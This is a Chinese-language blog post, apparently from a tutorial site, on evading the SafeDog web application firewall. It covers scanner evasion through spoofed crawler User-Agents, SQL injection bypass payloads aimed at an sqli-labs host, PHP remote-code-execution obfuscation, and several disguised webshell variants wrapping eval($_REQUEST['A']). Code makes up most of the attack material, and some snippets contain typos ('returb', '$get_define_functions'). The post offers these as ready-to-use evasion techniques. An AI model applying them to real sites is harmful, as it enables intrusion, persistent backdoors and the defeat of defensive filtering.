waf绕过:网络安全狗绕过

引言:

所有的绕过原理都大致一致,但是并不是所有的绕过都能起到作用,渗透测试主要还是一个猜加试的过程,本文仅供参考

网络攻击或扫描绕过

1.get绕过(未开启cc防护)

网络安全狗的默认防护为,拒绝head请求,在扫描工具中大部分使用head请求去收集目录信息,所以改用get请求绕过

2.cc防护绕过

cc防护:和检测流量攻击的原理相同,同一ip并发数过多对其进行禁用
1)延迟绕过:限制扫描速率
2)爬虫引擎:更换User-Agent头
sql 复制代码
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) 
Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)

sql注入绕过

sql内联注释绕过:针对MySQL

mysql为了兼容其他数据,将mysql的特有语句放入/*!100441 */,其他数据库不执行,但在mysql中正常执行

sql 复制代码
//被拦截
http://192.168.10.111/sqli-labs/Less-1/?id=2 and 1=1
//成功注入
http://192.168.10.111/sqli-labs/Less-1/?id=2' /*!10441and*/ 1=2 --+

特殊符号绕过:

%0a:为换行 %23:为#

sql 复制代码
192.168.10.111/sqli-labs/Less-1/?id=2' --+/*%0a and 1=2 union select 1,2,3%23*/
sql 复制代码
-- 最后展现在sql中的语句为
--+/*
and 1=2 union select 1,2,3 #*/

HPP参数污染:针对apache

因为apach接收数据时允许同名数据,并且最后一个数据为有效值,所以只有第最后一个参数后的语句有效

sql 复制代码
192.168.10.111/sqli-labs/Less-1/?id=2' /*&id=2' and 1=2 union select 1,database(),3 %23*/

RCE绕过

变量拼接绕过

waf对某些特殊字符串进行检测时可以使用

php 复制代码
//如果对phpinfo检测,可以把参数改为
$a='php';$b='info';$c=$a.$b;$c();

编码绕过

php 复制代码
assert(base64_decode('cGhwaW5mbygpOw=='));

字符替换绕过

php 复制代码
assert(str_replace('x','','sxyxsxtxexm("ipconfig")'));

传参绕过

php 复制代码
url:rce_eval.php?str=tem
$b=sys;$c=$_GET['str'];$a=$b.$c;$a('ipconfig');

后渗透绕过(木马免杀)

waf中eval和$_REQUEST同时出现时会被拦截

end免杀

end函数取数组最后一个元素

php 复制代码
eval(end($_REQUEST['A']));

define免杀

php 复制代码
define("b","$_REQUEST['A']");
eval(b);

拼接免杀

php 复制代码
$a='ev';
$b='al';
$c=$a.$b;
$d='c';
$$d($_REQUEST['A']);
//等价于eval($_REQUEST['A']);

函数免杀

php 复制代码
function abc($b){
    returb $b;
}
$a = abc("$_REQUEST['A']");
eval($a);

类定义绕过

php 复制代码
class user{
    $name='';
    function __construct($name){
        $this->name=$name;
    }
    function __destruct(){
        eval($this->name);
    }
}
$a=new user($_REQUEST['A']);

cookie绕过

php 复制代码
$cookie = $_COOKIE;
foreach($cookie as $key => $value){
    if($key=='eval'){
        $key($_REQUEST['A']);
    }
}

预定义函数绕过

php 复制代码
$defun = $get_define_functions();
//使用defun获取assert
$defun['internal'][841]($_REQUEST['A']);

编码绕过

php 复制代码
eval(base64_decode('JF9SRVFVRVNUWydBJ10='));

并不是所有方式都是有用

对于pc防火墙免杀如 火绒、360,也可以使用相同的思路

对于火绒免杀,有效的方法

相关推荐
Jerry_Gao92139 分钟前
【CTF】【ez-upload】FrankenPHP(v1.11.1)Unicode路径解析漏洞
安全·php·ctf·frankenphp
@hdd9 小时前
生产环境最佳实践:资源管理、高可用与安全加固
安全·云原生·kubernetes
AC赳赳老秦13 小时前
文旅AI趋势:DeepSeek赋能客流数据,驱动2026智慧文旅规模化跃迁
人工智能·python·mysql·安全·架构·prometheus·deepseek
Bruce_Liuxiaowei16 小时前
深入剖析 Windows 网络服务:用 witr 一键溯源所有监听端口
windows·安全·系统安全
сокол17 小时前
【网安-Web渗透测试-漏洞系列】RCE漏洞
web安全·php
ShoreKiten17 小时前
ctfshowweb入门 SSTI模板注入专题保姆级教程(二)
web安全·flask·ssti·ctfshow
xiejava101818 小时前
网络安全资产画像实战
安全·web安全·网络安全
菩提小狗1 天前
第16天:信息打点-CDN绕过&业务部署&漏洞回链&接口探针&全网扫描&反向邮件_笔记|小迪安全2023-2024|web安全|渗透测试|
笔记·安全·web安全
DeeplyMind1 天前
第25章 Docker安全
安全·docker·容器
智算菩萨1 天前
AI 安全前沿:从对抗攻击到大模型越狱与防御
人工智能·安全